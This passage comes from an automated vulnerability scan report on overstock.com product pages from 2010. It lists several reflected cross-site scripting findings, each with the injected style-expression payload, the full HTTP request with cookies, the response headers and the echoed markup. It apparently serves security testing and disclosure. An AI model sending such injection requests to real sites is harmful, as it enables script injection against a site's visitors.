...[SNIP]...
<input type="hidden" name="911db"style="x:expression(alert(1))"d7e35dfcee6" value="1"/>
...[SNIP]...

2.125. http://www.overstock.com/Health-Beauty/Farouk-CHI-Shooting-Star-to-Earth-1-inch-Styling-Iron-with-Organic-CHI-Oil/4123482/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-Shooting-Star-to-Earth-1-inch-Styling-Iron-with-Organic-CHI-Oil/4123482/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8a1"style%3d"x%3aexpression(alert(1))"a3062c1c785 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd8a1"style="x:expression(alert(1))"a3062c1c785 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-Shooting-Star-to-Earth-1-inch-Styling-Iron-with-Organic-CHI-Oil/4123482/product.html?bd8a1"style%3d"x%3aexpression(alert(1))"a3062c1c785=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:42 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408802569:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4123482|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:42 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:42 GMT; Path=/
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="bd8a1"style="x:expression(alert(1))"a3062c1c785" value="1"/>
...[SNIP]...

2.126. http://www.overstock.com/Health-Beauty/Moroccan-Oil-3.4-oz-Hair-Treatment/4494882/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Moroccan-Oil-3.4-oz-Hair-Treatment/4494882/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d9a5"style%3d"x%3aexpression(alert(1))"e54cec266ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d9a5"style="x:expression(alert(1))"e54cec266ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Moroccan-Oil-3.4-oz-Hair-Treatment/4494882/product.html?3d9a5"style%3d"x%3aexpression(alert(1))"e54cec266ec=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:38 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:38 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:38 GMT; Path=/
Set-Cookie: mxcproclicks=4494882|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:38 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408798446:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 102940

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Mo
...[SNIP]...
<input type="hidden" name="3d9a5"style="x:expression(alert(1))"e54cec266ec" value="1"/>
...[SNIP]...

2.127. http://www.overstock.com/Health-Beauty/Pollenex-by-Conair-Flexible-Teak-Shower-Mat/4413244/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Pollenex-by-Conair-Flexible-Teak-Shower-Mat/4413244/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abdaf"style%3d"x%3aexpression(alert(1))"fdebb58eab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as abdaf"style="x:expression(alert(1))"fdebb58eab4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Pollenex-by-Conair-Flexible-Teak-Shower-Mat/4413244/product.html?abdaf"style%3d"x%3aexpression(alert(1))"fdebb58eab4=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:45 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404965523:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4413244|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:45 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:45 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104891

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Po
...[SNIP]...
<input type="hidden" name="abdaf"style="x:expression(alert(1))"fdebb58eab4" value="1"/>
...[SNIP]...

2.128. http://www.overstock.com/Health-Beauty/i.d.-Bare-Escentuals-100-percent-Pure-Moxie-Makeup-Kit/3930813/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/i.d.-Bare-Escentuals-100-percent-Pure-Moxie-Makeup-Kit/3930813/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31339"style%3d"x%3aexpression(alert(1))"ef7f3945ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31339"style="x:expression(alert(1))"ef7f3945ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/i.d.-Bare-Escentuals-100-percent-Pure-Moxie-Makeup-Kit/3930813/product.html?31339"style%3d"x%3aexpression(alert(1))"ef7f3945ed=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:39 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3930813|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:39 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408799918:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:39 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=25
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109238

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>i.
...[SNIP]...
<input type="hidden" name="31339"style="x:expression(alert(1))"ef7f3945ed" value="1"/>
...[SNIP]...

2.129. http://www.overstock.com/Home-Garden/24-inch-Espresso-Brown-Leather-Counter-height-Saddle-Bar-Stools-Set-of-2/5039833/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/24-inch-Espresso-Brown-Leather-Counter-height-Saddle-Bar-Stools-Set-of-2/5039833/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd24"style%3d"x%3aexpression(alert(1))"c01130ffe12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cd24"style="x:expression(alert(1))"c01130ffe12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/24-inch-Espresso-Brown-Leather-Counter-height-Saddle-Bar-Stools-Set-of-2/5039833/product.html?2cd24"style%3d"x%3aexpression(alert(1))"c01130ffe12=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:24:24 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:24:24 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:24 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5039833|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:24 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406264912:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>24
...[SNIP]...
<input type="hidden" name="2cd24"style="x:expression(alert(1))"c01130ffe12" value="1"/>
...[SNIP]...

2.130. http://www.overstock.com/Home-Garden/A-Walk-in-the-Rain-Hand-painted-Canvas-Art-Set/5105715/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/A-Walk-in-the-Rain-Hand-painted-Canvas-Art-Set/5105715/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73179"style%3d"x%3aexpression(alert(1))"859c5084c71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73179"style="x:expression(alert(1))"859c5084c71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/A-Walk-in-the-Rain-Hand-painted-Canvas-Art-Set/5105715/product.html?73179"style%3d"x%3aexpression(alert(1))"859c5084c71=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:30:05 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:30:05 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406605513:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5105715|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:30:05 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:30:05 GMT; Path=/
Keep-Alive: timeout=5, max=1
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>'A
...[SNIP]...
<input type="hidden" name="73179"style="x:expression(alert(1))"859c5084c71" value="1"/>
...[SNIP]...

2.131. http://www.overstock.com/Home-Garden/A-frame-Espresso-Desk/4042651/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/A-frame-Espresso-Desk/4042651/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bbb9"style%3d"x%3aexpression(alert(1))"cc60dc457f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bbb9"style="x:expression(alert(1))"cc60dc457f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/A-frame-Espresso-Desk/4042651/product.html?3bbb9"style%3d"x%3aexpression(alert(1))"cc60dc457f9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:27:02 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:27:02 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:27:02 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4042651|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:27:02 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406422412:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109364

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>A-
...[SNIP]...
<input type="hidden" name="3bbb9"style="x:expression(alert(1))"cc60dc457f9" value="1"/>
...[SNIP]...

2.132. http://www.overstock.com/Home-Garden/ATH-Home-Bath-Space-Savers/4429367/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/ATH-Home-Bath-Space-Savers/4429367/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5723"style%3d"x%3aexpression(alert(1))"dc27975fdfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5723"style="x:expression(alert(1))"dc27975fdfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/ATH-Home-Bath-Space-Savers/4429367/product.html?a5723"style%3d"x%3aexpression(alert(1))"dc27975fdfa=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
